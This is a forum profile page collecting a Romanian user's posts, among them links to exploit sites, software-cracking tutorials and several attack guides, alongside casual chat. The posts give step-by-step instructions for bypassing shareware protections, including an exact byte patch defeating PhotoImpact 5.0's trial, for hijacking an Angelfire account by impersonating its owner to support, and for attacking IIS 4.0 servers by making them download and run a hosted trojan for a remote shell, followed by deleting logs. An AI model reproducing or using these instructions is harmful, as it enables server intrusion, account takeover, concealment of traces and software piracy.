Jump to content

MaHaReT

Active Members
  • Posts

    900
  • Joined

  • Last visited

Everything posted by MaHaReT

  1. http://www.rootkit.com/
  2. http://www.immunitysec.com/index.shtml http://www.datastronghold.com/ http://www.infosecinstitute.com/courses/et...g_training.html http://www.artofhacking.com/orange.htm http://www.frsirt.com/exploits/ http://www.insecure.org/sploits.html http://www.hackaday.com/ http://www.illmob.org/ http://www.malware.com/ http://www.milw0rm.com/ http://www.packetstormsecurity.org/ Daca sunt bune , raman , daca nu , cosu'ui al lor !! voi decidetzi
  3. Generalul Cracking Am pornit sa scriu un nou articol, si anume unul despre cracking in general. In primul rand : Ce inseamna cracking? Cracking-ul insemna a gasi schemele de protejare a unui program, a fi in stare sa le dezactivezi temporar sau permanent pe diverse cai. Bun. Si care ar fi aceste scheme ? Ele sunt variate : simple numere de inregistrare, protectii care verifica daca exista sau nu anumite fisiere, limtatii de diverse feluri (la timp, numar de utilizari, diverse optiuni dezactivate etc.), prezenta CD-rom-ului in unitate, chei hardware (dongles). Ca programe sunt folosite debuggerele EX : debug din DOS, Soft-ICE. Pentru generare de listing-uri in asm sunt folosite dezasambloare : EXSourcer pentru DOS ,W32Dasm, IDA pro pentru programe WIN 16 sau WIN 32. Cu Soft-Ice poti face aproape orice cu programul ales atata timp cat acesta este incarcat in RAM. De exemplu poti schimba adresa de executie a programului, poti schimba continutul registrilor procesorului, poti vedea orice zona din memorie, poti seta sau reseta flagurile etc Dar cum am spus, modificarile vor fi valabile doar in RAM nu si pe hard disk. Ei bine, W32Dasm dezasambleaza programul ales, afiseaza clasele, siruri de caractere folosite in program, offset-urile, adresele relative, referiri la adresele de la care au fost executate salturi. Listing-ul se poate salva, spre o utilizare viitoare, deasemenea se poate incarca intr-un editor de texte. Voi trata in acest eseu cracking-ul programelor pentru Windows pe 16/32 biti. 1. Numere de inregistrare Ce sunt si cum se obtin? Cred ca de multe ori ati intalnit programe shareware care cer numere de inregistrare pentru a putea fi folosite ca programe full. Unele numere de inregistrare sunt simple siruri de caractere alfa-numerice care se afla undeva in program sau in fisierele folosite de acesta. Altele pot fi obtinute prin diverse operatii asupra numelui si/sau companiei, adresei, numarului de telefon etc Sunt programe care folosesc un sistem de criptare avansat (EX : WinRAR). Unele numere de inregistrare difera de la un sistem la altul si de aici nevoia de patchuri sau generatoare de coduri (keygenerators). Cum pot fi gasite ? Folosind un debugger (Soft-Ice e cel mai bun). Se pun puncte de intreruperi la functiile din WINDOWS care permit transferul datelor dintr-o casuta de dialog intr-un anume buffer : GetDlgItemText(A),GetWindowText(A), GetDlgItem etc. Ar trebui stiute prototipurile acestor functii. Ele pot fi gasite in SDK de la WINDOWS etc. Pentru a afla adresa din memorie unde se afla numarul serial introdus se executa o cautare in Soft-Ice : s 0 l ffff "cod_introdus" - pentru programe pe 16 biti s 0 l ffffffff "cod_introdus" - pentru programe pe 32 biti Daca exista string-ul cautat, va fi afisata adresa acestuia. Mai departe se pune o intrerupere la accesarea acestei adrese la citire/scriere. Astfel, Soft-Ice va opri temporar programul acolo unde se va executa o operatie asupra sirului introdus : copiere in totalitate sau numai a anumitor caractere, comparare etc. Ideal ar fi sa se gaseasca cat mai usor compararea numarului fals cu cel real dar acest lucru se intalneste numai la programele cel mai prost protejate EX : Cmp Eax, Ebx unde eax poate stoca codul real , ebx cel fals. Pot fi comparate doar anumite carctere de exemplu daca primul caracter coincide cu '5' sa zicem, si ultimul cu 'R' atunci totul este ok. Compararea se poate face si indirect, adica fara ajutorul instructiunii Cmp. Iata un exemplu : Eax contine codul adevarat iar Ecx cel fals. Daca diferenta dintre ele este 0 atunci iarasi e ok. Acestea sunt doar cateva situatii. In caz ca se face copierea sirului la alta adresa atunci trebuie pus un punct de intrerupere la noua adresa : bpm adresa_noua sau bpr 30:adresa_noua 30:adresa_noua + lungimea_sirului si se sterge cel vechi cu bc nr_intrerupere_precedenta. Ordinea intreruperilor se poate afla cu 'bl'. Acest procedeu se repeta daca este intalnita iarasi o copiere. Daca programul nu foloseste nici una dintre functiile API de mai sus, se pot folosi Hmemcpy sau alte metode. Una dintre ele este urmatoarea : tastati 'task' , obtinand astfel numele modulului de spart, apoi 'hwnd nume_modul_cautat' si cautati in rubrica 'Class Name' edit, retinand ce scrie la 'Window Handle'. Dupa aceea se pune o intrerupere la handle-ul gasit pentru orice mesaj WM_GETTEXT trimis (daca aveti putine cunostiinte de programare de Windows veti intelege mai mult) : 'bmsg handle_gasit wm_gettext'. Soft-Ice va iesi la iveala atunci cand programul va prelua informatia introdusa. Pentru a ajunge in codul programului se apsa F12 de cateva ori. Sper ca nu v-am incalcit gandurile prea mult cu aceasta rubrica de numere de inregisrtare; acestea sunt cele mai comune situatii. Un caz particular se constituie in programele scrise in Visual Basic. Aici se utilizeaza de cele mai multe ori formatul WideString. De exemplu deschidem executabilul cu un editor hexa si vrem sa cautam sirul "Unregistered" (de ce oare ? ;P) vom cauta U.n.r.e.g.i.s.t.e.r.e.d. si nu Unregistered.In cazul programelor vb W32DASM o da in bara in marea majoritate a cazurilor pentru ca executabilul nu este unul obisnuit. El contine date si chemari de functii standard continute in dll ca VBRUN300.DLL, VB40016.DLL sau VB40032.DLL, msvbvm50.dll, msvbvm60.dll care se afla in c:windowssystem. Reverserii de la Dread au venit in ajutorul crackerilor cu o versiune a W32DASM care poate vedea referintele la diverse string-uri. In cazul acesta se poate aplica schema obisnita si anume se cauta mesajul (daca exista si se va schimba conditia de validare a numarului serial (eX: in loc de jne mesaj_eroare se pune je, adica totul este ok atata timp cat numarul de serie este diferit de cel corect ) facandu-se un patch. Aceasta metoda este standard. Ea se poate optimiza. De exemplu pot fi mai multe verificari. Dar ce ne-am fi facut fara aceasta scula? Ei bine, razzia a gasit o solutie valabila pentru vb3 si 4. Iata : - se executa un search de forma s 0 l ffffffffff 8B,CA,F3,A6,74,01,9f,92,8D,5E,08,E8,0E,06 - se pune un punct de intrerupere la adresa rezultata din cautarea de mai sus: bpx <seg:offset> - F5 pana se ajunge la verificare Tot ce aveti de facut este sa vizualizati continutul de la ds:(e)di si ds:(e)si. Pentru programele scrise in VB 4 este valabil acelasi algoritm dar se executa s 0 l fffffffff 56,57,8b,7c,24,10,8b,74,24,0c,8b,4c,24,14. In VB 5,6 lucrurile se simplifica oarecum. Acum se pot pune bpx-uri la functii de comparare standard : __vbastrcomp, __vbastrcmp etc. IMPORTANT : in fisierul winice.dat trebuie mentionate cele 2 dll-uri astfel EXP=c:windowssystemmsvbvm50.dll si EXP=c:windowssystemmsvbvm60.dll. Pentru programele in vb6 bpx-ul se va pune astfel : bpx msvbvm60!__NumeFunctie. O lista cu alte functii vb se poate obtine tastand in Soft-Ice exp __vba. Un alt program care va poate ajuta vine tot de la NuMega, si anume SmartCheck, un fel de decompilator. Il puteti folosi la gasirea de algoritmi de generare a numerelor seriale (util pentru genaratore de key-uri). Cam atat despre Visual Basic Cracking. 2. Cate ceva despre mesajele 'suparatoare' (nag-screens) De cate ori nu ati intalnit un program shareware care sa nu va streseze ca mai aveti doar x zile de utilizare a programului respectiv, sau ca programul este 'Unregistered', sau bla...bla...bla In acest caz, W32Dasm ajuta destul de mult, deoarece arata referintele la diverse string-uri,si, daca priviti mai sus dati probabil si peste cauza care a produs afisarea acestora (in loc si la timp nepotrivit . Odata gasita aceasta conditie, se inlocuieste cu opusa ei si se face un patch pentru a elimina definitiv acest bug...Presupunand ca avem un nag-screen care afiseaza 'Mesaj' putem proceda astfel: incarcam executabilul in W32DASM si pe urma ii dam un 'Search' scriind mesajul de mai sus. Vom ajunge acolo unde a fost facuta referinta la acest string : :004043D4 85C0 test eax, eax :004043D6 7437 je 0040440F :004043D8 6A04 push 00000004 * Possible StringData Ref from Data Obj ->"Mesaj"; esti aici :004043DF 68C8C44000 push 0040C4C8 :004043E4 8B5508 mov edx, dword ptr [ebp+08] :004043E7 52 push edx * Reference To: USER32.MessageBoxA, Ord:01BEh :004043E8 FF159CA14000 Call dword ptr [0040A19C] Pentru a scapa de mesaj se poate pune in loc de je 0040440F jne 0040440F sau je 0040440F sau jmp 0040440F(in patch se va inlocui 74 (je) cu 75(jne) sau EB (jmp)). Se observa ca nag-screen-ul s-a constituit intr-un messagebox. Putem folosi si Soft-Ice astfel bpx messageboxa, F12 odata, ctrl+UP ca sa vedem conditia, punem un bpx la adresa cu saltul conditionat (in cazul nostru 004043D6), F5, provocam programul sa ne arate iarasi mesajul, caz in care ne trezim in Soft-Ice la bpx pus inainte..., rfl z (adica setam flagul z in pozitia dorita , bc *, si sdin nou F5. Nici urma de nag-screen. Unele nag-screen-uri mai atragatoare pot fi cele care folosesc DialogBoxParamA, DialogBoxIndirectParamA etc --------- asta presupun ca`i continoarea ---------
  4. Cum sa hackuiesti un cont angelfire ! Si cum spuneam numarul trecut "totul are un inceput ....." Buuun .... Ai un "prieten" pe net care are o pagina pe server-ul angelfire si vrei sa-l uimesti "un pic". Cum faci? Simplu ii hack-uiesti pagina de pe angelfire. Cum ? Simplu asta-i un exemplu: ***** Pasul 1 ***** Afla-i adresa paginii, spre exemplu http://www.angelfire/ca/prieten/index.html. Buuun .. ce spune acesta adresa? ca pagina este pe server-ul angelfire.com (logic!) in directorul /ca este pentru statul California iar directorul /prieten spune (in general) numele "prietenului".Index este numele paginii , poate fi diferit dar de cele mai multe ori este pagina principala. ***** Pasul 2 ***** Buuun ... acum ai nevoie de vechea adresa de e-mail a "prietenului" Deobicei o gasesti in pagina de web. ***** Pasul 3 ***** Acum ca ii sti adresa de web si e-mail a "prietenului", trebui sa ii afli numele - deobicei il gasesti pe pagina de web. Daca nu incearca sa afli numele real de la el - chat, icq, e-mail ... . ***** Pasul 4***** Dupa ce ai aflat toate aceste informatii trimite un e-mail la Angelfire si spune cat de nefericit esti adresa de e-mail este: mail@angelfire.com. Scrisoarea trebuie sa sune "adevarat", scrie in ea ceva de genul - am fost intr-o calatorie mai lunga si am uitat parola - spune ca ti-ai schimbat adresa de e-mail iar cea veche nu mai este valabila si ai vrea sa primesti parola pe noua adresa de e-mail asa ca da-le noua adresa de email pentru primi parola iar in urmatoarele zile vei primi parola in casuta postala. Cam asta este una din ideiile de hack-uiala a contului de pe angelfire. SUGESTIE - mai sunt si alte servere care dau spatiu gartuit si se bazeaza pe acest mod de comunicare cu abonatii. ///////////////////// Cum sa hack-uiesti un ftp? ///////////////////// In windows 9x deschideti un prompt dos si tastati: ftp adresa victimei server-ul va cere: username apasati enter server-ul va cere: password apasati enter la promptul care apare tastati: quote usr ftp apoi tastati quote cwd ~root apoi tastati quote pass ftp Asigurati-va ca stergeti log-ul. Fisierul cu parole pentru cei care au drepturi pe sistem il gasiti in /etc/password deci odata ce ati intrat in sistem tastati cd /etc get passwd Daca totul a fost ok iar serverul este putin mai vechi GATA ati captat dreptul de root - veti putea face ce dori cu sistemul.NOTA: Cele de mai sus merg pe majoritatea serverelor mai vechi in special cele de la universitati.edix
  5. IIS 4.0 Web Atack Aceasta este prima parte dintr-o serie de articole despre BUG-urile Windows-ului NT , si are scop PUR EDUCATIONAL , prin aceasta nu-mi asum responsabilitatea utilizarii cu alte scopuri decit cele educationale.Cam atit cu partea introductiva , de trebuie si ea pusa pe aici. Sa trecem la lucruri serioase; de ce se cheama WEB Atack ? , simplu , pentru ca atacul este indrepta asupra serverului de internet al Windows-ului NT , si mai precis , se da direct pe Portul 80 , ceea ce face ineficienta o protectie cu FireWall . Sa vedem acum ce face ? Pai nimic grav , Doar oricine poate obtine prompt DOS in server cu drepturi de ADMINISTRATOR , adica poti face ce vrei cu bietul server , de la sterfisiere , schimbat parole , pina copiat informatii din intreaga retea , nu numai de pe server , asadar o nimica toata. Pentru a explica cum functioneaza , este necesara explicarea , sau mai precis , prezentarea citorva din facilitatiile IIS 4.0 : HTR - HTML Remote Administration Permite administrare de la distanta . IDC - Internet DATABASE Connector Permite unei aplicatii de internet sa acceseze HDD , in mod direct prntru cautare de date . STM - Server Files Cind se face o cere catre un server ( adresa de internet ) - http://www.tinta.com - , serverul de internet , IIS 4.0 , raspunde prin trimiterea cererii catre niste programele ( htr.dll , idc.dll , stm.dll ) , care analizeaza cererea , si hoatarasc ce sa faca . In acest lant , a aparut o scapare , si se poate ca in anumite situatii , in urma unei cereri , sa se faca un DOWNLOAD urmat de o EXECUTIE pe server a unui TROJAN . Problema cu toate ca este foarte periculoasa , in loc sa fie analizata serios , a facut , ca acest lucru - Download-ul si EXECUTAREA pe SERVER / WORKSTATION ( prin workstation ma refer la ori ce calculator care are un sistem de operare pe el ) a programelor sa ia amploare prin utilizarea tehnologiei JAVA , care este baza pe acest lucru . Acesta va fi un alt subiect de articol intru-un nr. viitor. Sa reluam discutia ; zice-am ca IIS 4.0 va rula programul pe care i l-am indicat , in cazul nostru un trojan , in urma exectarii acestuia , se va trimite pe portul 80 sau 99 prompt DOS cu drept de ADMINISTRATOR. Cum se ataca un server , folosind acest BUG ? Mai intii se pune la o adresa de internet trojanul - se zicem ca exemplu la geocities sau tripod sau in oricare alta parte unde se asigura free web hosting ( asta ca sa nu se prinda de unde s-a dat atacul ) , pentru cazul nostru asdresa unde se afla trojanul este : http://www.freeservers.com/MySite/ncx.exe sau http://www.freeservers.com/MySite/ncx99.exe , unde atit ncx.exe ( pentru portul 80 ) , cit si ncx99.exe ( pentru portul 99 ) sunt trojenii care vor fi download-ati si executati de serverul tinta .Programele trebuie sa se afla - in cazul exemplului - in root-ul site-ului , adica unde se afla pagina Defaul.htm sau index.html , mai precis unde se afla intreg site-ul. Acum este foarte simplu ce aveti de facut , doar butonati urmatarea linie de comanda : iishack www.tinta.com 80 www.freeservers.com/MySite/ncx.exe Parametrii de lasare a programului IISHACK : SINTAXA: iishack <host> <port> <url> ex - iishack www.tinta.com 80 www.myserver.com/thetrojan.exe Dupa trimiterea atacului , IIS 4.0 de pe tinta , nu va mai raspunde la comenzii , iar trojan-ul se va download-a si se va executa , apoi , daca totul a fost OK , se poate face telnet pe www.tinta.com pe portul 80 sau 99 ( functie de trojan-ul folosit ) si va aparea un prompt de DOS . Trebuie avut grija , ca sunt necesare cateva secunde pina se face download-ul , iar telnet-ul trebuie dat in max 30 sec. , dupa aceea trebuie restartat serverul tinta . Dupa intrare trebuie sterse logurile : c:winntsystem32logs , si sterge-ti tot ce se poate , pentru a nu lasa urme. ATENTIE !!!! Nu poate fi rulat decat o singura data , IIS , blocandu-se , aceasta necesitand o reinitializare a sistemului .
  6. Cum sa spargi PhotoImpact 5.0 de la Ulead Saluatare oameni buni! M-am decis sa scriu acest tutorial deoarece PhotoImpact este un program benga care te ajuta cu multe chestii atunci cand e vorba sa-ti faci o pagina de web, vrei sa prelucreazi fotografii si nu numai. Initial acest tutorial a fost scris in limba engleza, dar vazand unele site-uri romanesti cu informatii despre cracking m-am decis sa il rescriu in romana sa inteleaga tot romanu'. Programul il puteti gasi pe multe dintre CD-urile de la revistele dedicate IT(EX.Chip). Scule necesare Soft-Ice 3.24 - cel mai mishto debugger oferit de NuMega (multe multumiri) Win32Dasm 8.93 - un dezasamblor mishto pentru incepatori si nu numai Editorul tau hexa favorit - as sugera Hexworkshop32 (TOATE ACESTEA POT FI GASITE LA www.crackstore.com). Sa pornim. Instalati programul si pe urma rulati-l. Veti vedea un nag-screen suparator care va ca folositi o versiune numai pentru incercare valabila o singura luna. Setati timpul cu o luna dupa expirarea programului si rulati-l iarasi. Veti obtine un mesaj ca asta : "Your 30 day-trial period has expired" bla,bla... Click pe 'OK' si programul va spune ciao! Cum sa facem sa nu mai expire? Sunt mai multe cai. Iata una dintre ele. O sa punem un breakpoint (punct de intreupere) la functia MessageBoxA care ne-a aratat acel mesaj stupid. Tastati ctrl+d pentru a intra in Soft-Ice. Puneti breakpoint-ul: bpx messageboxa si apasati F5. Acum porniti iarsai programul. Sice se va opri la inceputul functiei messageboxa. Dar noi trebuie sa ajungem acolo de unde a fost chemata aceasta functie. Pentru aceasta apasati F11. Va veti trezi in u32cfg.dll la aceasta secventa de cod: :4EB06EDF FF155482B04E Call dword ptr [4EB08254] :4EB06EE5 50 push eax * Reference To: USER32.MessageBoxA, Ord:01BEh | :4EB06EE6 FF157C81B04E Call dword ptr [4EB0817C] << esti aici :4EB06EEC 5F pop edi :4EB06EED C3 ret Dupa cum puteti vedea nu exista nici o cale sa crack-uiti programul aici. Sa continuam executia programului pas cu pas. Parcurgeti doua linii (cu F10). Veti vedea: :4EB06E62 68F0550000 push 000055F0 * Referenced by a (U)nconditional or ©onditional Jump at Address: |:4EB06D2C(U) | :4EB06E67 E814000000 call 4EB06E80 :4EB06E6C 83C40C add esp, 0000000C << esti aici * Referenced by a (U)nconditional or ©onditional Jump at Addresses: |:4EB0601B©, :4EB06084©, :4EB06C6F©, :4EB06CF3© | :4EB06E6F 5F pop edi :4EB06E70 5E pop esi :4EB06E71 5D pop ebp :4EB06E72 33C0 xor eax, eax << hmm...nimic bun aici... :4EB06E74 5B pop ebx :4EB06E75 81C470060000 add esp, 00000670 :4EB06E7B C3 ret Chemarea rutinei de la 4EB06E80 va va afisa mesajul cel urat daca au trcut cele 30 de zile de evaluare si va intoarce ca rezultat fie 1 in eax, caz in care programul merge mai departe, fie 0 semn ca programul a expirat caz in care se va intrerupe executia sa. Acum avem destule informatii ca sa realizam crack-ul. Ati putea inlocui call 4EB06E80, cu 33C0 xor eax, eax ; eax=0 40 inc eax ; eax=1 40 inc eax ; eax=2 48 dec eax ; eax=1 ceea ce avem nevoie evitandu-se astfel chemarea acestei rutine si xor eax, eax cu nop ; nop ; pentru ca nu avem nevoie de valoarea 0 in eax. Faceti rost de offseturi folosind w32Dasm (acestea sunt 6E67, 6E72). In hexeditorul preferat incarcati fisierul u32cfg.dll si schimbati la primul offset E814000000 cu 33C0404048 si la cel de al doilea 33C0 cu 9090. Salvati-l. Rulati-l . Folositi-l cu placere! Nici un messagebox sau vreo limita la timp doar programul mergand foarte misto. Si acum un mic rezumat: Pentru a inpusca doi iepuri dintr-o lovitura, ne-am folosit de mesajul ce anunta expirarea programului simuland apasarea butonului 'OK' . O varianta destul de isteata, nu? Dar puteti sa eliminati protectia la timp folosindu-va de functia GetSystemTime dar acesta este o cale mai lunga...Vi-o las ca tema Daca nu ati inteles mare lucru din acest tutorial, atunci cititi mai multe tutoriale destinate incepatorilor in cracking disponibile pe INTERNET. ***Totul a fost scris in in scopuri pur didactice. Autorul nu isi asuma raspunderea pentru orice lucru neplacut care vi s-ar putea intampla in urma citirii acestuia***
  7. Trebuie sa mai stiti ca din ce in ce mai multe programe "ies" pe piata impachetate. Adica executabilul spre exemplu xxxx.exe este supus unei operatii de criptare... sau de comprimare in scopul protejarii lui impotriva actiunilor corozive a crack-erilor... eh eh eh...i ntelegi ce vreau sa spun. Aici este ceva mai mult de discutat. Un astfel de executabil dupa opeatia de impachetare devine yyyy.exe cu o marime variabila (daca initial ar fi avut 2Mb dupa ar putea avea 3sau 1Mb in general mai mica). Pe piata actuala se gaseste o varietate de astfel de packere... Neolite, PKlite, Shrinker, ASPack ce stau la dispozitia softistilor pentru a-si proteja munca. Cum actionaza aceste packere ?.... in mare supun executabilul ce trebuie protejat unor algoritmi mai mult sau mai putin complecsi rezultand in final o mare harababura ( veti intelege mai putin mai tarziu cu afecteaza ea dezasambloarele ). O data harababura terminata isi lasa o parte din ele la inceputul programului EP si banuiti cred ca aceasta nu poate fi altceva decat un algoritm prin care harababura sa fie adusa la forma ei initiala. Dar cu aceasta harababura cum se mai poate executa programul ? Pai simplu... intai se despacheteaza datorita algoritmului cu care incepe sa ruleze si dupa ce s-a despachetat total aceasta rutina de despachetare da controlul spre executie programului propriuzis. In SoftIce noi putem monitoriza tot acest proces dar acest lucru cere multa experienta si determinarea algoritmilor de impaketare este foarte greoaie chiar si pentru experti. Sa vedem cum ne afecteaza activitatea aceste packere. Sa presupunem ca avem de anulat un nag (o fereastra nedorita)... ei bine cautam in SoftIce ceva jmp-uri si gasim ca avem de inlocuit stiu eu 74 spre exemplu cu EB. Revenim apoi intr-un hexeditor sa aplicam patch-ul (petecul) si stupoare nu gasim 74 ala. Nota: - primul semn ca un program e impachetat e faptul ca daca cautam intr-un hexeditor un sir hexa (pe care il notam la intamplare din SoftIce) nu il gasim. - o alta simptoma ar fi aceea ca dupa incarcarea intr-un dezasambler nu gasim string referance, si instructiunile nu au nici o insiruire logica. Acestea fiind spuse va dati seama ca peticirea este imposibila caci nu vom gasi ceea ce cautam. Vom ramane cu programul spart doar la stadiul de SIce. Si pentru ca suntem la sectiunea de unpackers sa revenim la oile noastre. La ce sunt bune unpackerele? Pai ati uitat ca pentru a se executa programele impachetate au nevoie sa se despacheteze intai ? Si unde... in memorie desigur. Eeee asta era... deci ce fac unpackerele astea de fapt... asteapta pana ce rutina de despachetare isi termina treaba si apoi dump-eaza zona de memorie in care se afla programul gata de executie. Frumos nu? Cu toate acestea rezultatele nu sunt garantate tocmai pentru ca exista o multitudine de packere fiecare necesitand parametrii specifici de dumpare. Tatal tuturor unpackerelor si nasul packerelor e ProcDump ajuns acum la versiune 1.6. Acesta recunoaste multe packere si in plus ofera posibilitatea configurarii pentru cele necunoscute. Odata executabilele despachetate si functionale (nu orice dump poate fi functional 99%) nu ne ramane decat sa aplicam patch-ul. Patchers (generatoare de crackuri) -------------------------------------------------------------------------------- Presupunem ca avem programul gata spart si vrem sa'l facem public. Nu stim de asemeni prea multe de-ale programarii. Ce facem atunci ? Patcherele sunt mici executabile care au capacitatea de a genera alte executabile. Ele sunt de mai multe tipuri in functie de necesitati: Search and replace cauta o secventa predefinita intr-un anumit fisier si o inlocuieste cu ce trebuie... util in cazul unor crackuri pentru mai multe versiuni ale aceluiasi program care pastreaza aceeasi protectie dar are dimensiuni diferite (exe-le). File compare genereaza un crack-ul prin compararea fisierului spart cu originalul... in acest caz crackul e functional doar pentru versiunea exacta a programului pe care a fost facut. RunTime pach destul de interesant si in ultima instanta un inlocuitor la unpatcherelor... programul nu mai trebuie despachetat (si ganditi-va ce usurare si in plus nu de putine ori exista cazuri cand aceasta esueaza), patchul executandu-se in timpul rularii in memorie a programului ce trebuie spart. Alte utilitare --------------------------------------- Programatorii vor sa ne umple calculatorul cu tot felul de porcarii . V-ati pus vreodata intrbarea cum poate un program sa tina minte de exemplu data cand a fost instalat astfel ca dupa x zile sa va bage nag-ul in fata si sa va spuna arogant... "Gata m-am terminat" ? ... ce nesimtire !!!! ...sau la o protectie putin mai complicata chiar daca dati ceasul inapoi sa va ameninte ca va formateaza hardul!!!. Desigur el nu poate face asta decat lasandu-si ceva amprente prin registrii sau ascunzand pe undeva un fisier cu data resprctiva criptata sau nu. Important in crackuirea unui program este sa stim ce si unde modifica acesta la instalare sau in timpul rularii... de ce date are el nevoie din registrii... etc. Doua astfel de programe unul monitorizand registrii si altul fisierele cu care interactioneaza o anumita aplicatie sunt RegMon si FileMon . Nu mai vorbim aici cum putem determina si apoi sterge data... ora... la care s-a instalat un anumit program numarul de utilizari.. etc. Chiar daca de multe ori gasirea orei.. datei sunt dificile numai simpla identificare a cheilor scrise in registru e importanta.. caci aceste chei pot fi sterse si programul reinstalat ca intaia oara.
  8. Continut: Structura unui exe-cutabil.. Dezasambloare-Debuggere.. Hexeditoare.. Unpack-ere.. Patchers.. Alte utilitare.. Bun-venit in lumea crackerilor!! -------------------------------------------------------------------------------- Well oameni buni.... daca ati ajuns sa cititi aceste randuri inseamna ca sunteti interesati intr-o oarecare masura de spartul programelor. Toata lumea are o idee despre ceea ce inseamna freeware , shareware...programe ce le gasim pe Cd-urile revistelor lunare (care pe la noi sunt cam putine) si care sunt perzentate spre evaluare. Toti cred ca au trecut printr-un moment in care am spus "mai sa fie programul asta era asa de misto si acum nu-l mai pot utiliza ca s-au dus 30 de zile". Eh eh eh... eeeeiii a venit momentul sa dam de cap programelor astora care trebuie sa faca ce vrea Muschii Nostri, nu ce le-au pus programatorii sa faca ..si pentru ca acesta pagina nu este decat un INTRO aici imi propun sa fac o descriere in mare a ceea ce trebuie sa stiti despre cracking. Structura unui executabil -------------------------------------------------------------------------------- O imagine reala a unui executabil v-o puteti face privindu-l ca pe un sir foarte lung format numai din 1 si 0 , ceva de genul 101110100010001010001001001010........ . Cum recunoaste sistemul de operare ca acest sir este un program executabil nu este treaba noastra dar in mare va pot spune ca el scaneaza prin multitudinea de biti la adrese fixe , predefinite anunite siruri si comparand cu ceea ce cunoaste el da verdictul. Mai pe omeneste sa presupunem ca avem un fisier de tipul MZ..,qwu..u22..111002.7izj...wh.............( 1 si 0 de mai sus pot arata si asa in baza 16 ..atentie)..pai Os-ul (sistemul de operare) cauta sa spunem primii 2 bytes in cazul nostru gasind MZ, apoi ii compara cu ceva ce el cunoaste si apoi in functie de rezult stie ca are de-a face cu un executabil...sau altceva. O alta chestie interesanta e ca bitii aia nu stau asa la intamplare. Ei reprezinta condensarea pana aproape de perfectiune a informatiei... si asta-i nimic... cand te gandesti la ADN... Un fel de functie daca se poate spune asa, care in volumul infim pe care-l ocupa contine atatia parametrii incat sa dea nastere unui organism atat de complex cum e corpul uman si apoi mai este si... mintea... eeeeheheeee.... O parere despre cum e compus un executabil v-o puteti face utilisand un PE wiewer. Acest program arata sectiunile executabilului zone in executabil asemanatoare unui organism. Unele stocheaza cod executabil... un fel de inima altele resurse... bitmapuri icoane text un fel de haine... Cam atat despre structura... lucrurile sunt complicate ar mai fi de mentionat aici ca fiecare program atunci cand incepe sa se execute are o adresa bine definita de unde sa o faca atunci cand se incarca in memorie. Aceasta este specificata desigur cum banuiti intr-o zona precisa in executabil si se numeste Entry Point (EP). Cand apasam pe iconita unui executabil OS-ul citeste o gramada de parametii din exe printre care si EP-ul, il incarca apoi in memorie (pe exe) si da drumul exe-ului tocmai la adresa precizata de EP. Dezasambloare si debuggere -------------------------------------------------------------------------------- Pentru inceput trebuie sa stiti care sunt instrumentele necesare si ce fac ele in mare..cu ce ne ajuta ele in munca noastra. O prima clasa ar fi cea a dezasambloarelor si debuggerelor programe cu care codul binar este transformat in limbaj inteligibil pentru om de fapt cam ultimul nivel din care omul mai poate intelege ceva. Iata aici cum din acest se transforma: Cod binar 1010101100101 -------> dezasambler debugger -------> call, jmp, deci codul binar (binar de la unu si zero) e transformat in instructiuni care pentru noi inseamna ceva. Diferenta dintre un dezasamblor si un debugger este faptul ca primele proceseaza programul executabil si genereaza apoi un "dead listing" (un gen de fisier text in care codul binar e tradus in limbaj de asamblare) pe cand celelalte care sunt si cele mai inportante tool-uri fac acelasi lucru dar in timp ce programul este incarcat in RAM si se executa. De aici rezulta si superioritarea acestora din urma fata de primele... adicatelea debuggerele dau posibilitatea crackerului sa ruleze programul instructiune cu instructiune sa modifice in timp real instructiuni si totodata sa observe efectele modificarilor facute... bla bla bla... SoftIce este the best tool in clasa debuggerelor practic 95% din programele crackuite de mana lu' SIce mor. Ca dezasambloare e de amintit W32Dasm care este si debugger este usor de folosit datorita interfetei win32. Daca acum auziti prima data de ele va sfatuiesc sa faceti repede rost de ele si sa incepeti prin a va obisnui cu utilizarea lor... Nu insist mai mult utilizarea lor e mai bine de invatat pe exemple.. Hexeditoare (eeee.. buuuun.. ce este un hexeditor ?) -------------------------------------------------------------------------------- Odata crackuite (sparte) utilizand fie SIce fie alte programe este nevoie ca crackul sa fie aplicat definitiv executabileleor. Acest lucru este posibil utilizand un hexeditor. Eeee.. bun.. ce este un hexeditor? Un hexeditor este un program care "deschide" un executabil afisandu-i continutul in forma hexadecimala (vezi reprezentare numerelor in diferite baze ..2..10..16). Oricum intr-un astfel de hexeditor veti vedea numere de la 1 la 10 si litere de la A....F. Nu mentionez aici nici un nume... ele sunt foarte numeroase... ramane la latitudinea fiecaruia sa-si aleaga pe cel ce-i place mai mult. " ERA Unpackers "(despachetatoare)
  9. da ce , zici ca esti roman , sti romana nu ?
  10. Compania Microsoft doreste sa coopteze o echipa formata din 11 consultanti si specialisti software pentru a lucra intr-o filiala din Irlanda. Oferta este disponibila doar pentru persoanele din Bucuresti, Iasi si Timsoara, care trebuie sa aiba o experienta de minimum cinci ani in domeniu, insotita de referinte, informeaza Mediafax. De asemenea se cer calificari tehnice de specialitate si cunostinte avansate de limba engleza. Salariile pentru programatorii software sunt cuprinse intre 65.000 si 85.000 de euro anual, iar cazarea si transportul sunt asigurate de companie. Romania se afla pe o lista a celor mai importante piete din tarile in dezvoltare, potrivit unor declaratii anterioare ale reprezentantilor subsidiarei locale a Microsoft. Ne bagam ? :) :)
  11. io zic cai mort , daca ar fi viu , ar fi aparut pe undeva , ce traieste`n muntzi ??
  12. si io de cand am gasit forumu [mi la zis maleficus si ii multumesc] nu mai dorm noaptea .... ! de 4 zile stiu forumu , 3 nam dormit deloc si 1 am adormit pe la 7 dim. !!!
  13. aruncatzil la gunoi ... pls , nui bun .... !
  14. de instalat , lam instalat da dupaia .................... cand dau sa rulez programu imi apare o fereastra (gen cmd) ~ ! acolo ce scriu ?
  15. http://www.ebook.eu.org/files/HACK/Exploit...-shell-code.pdf
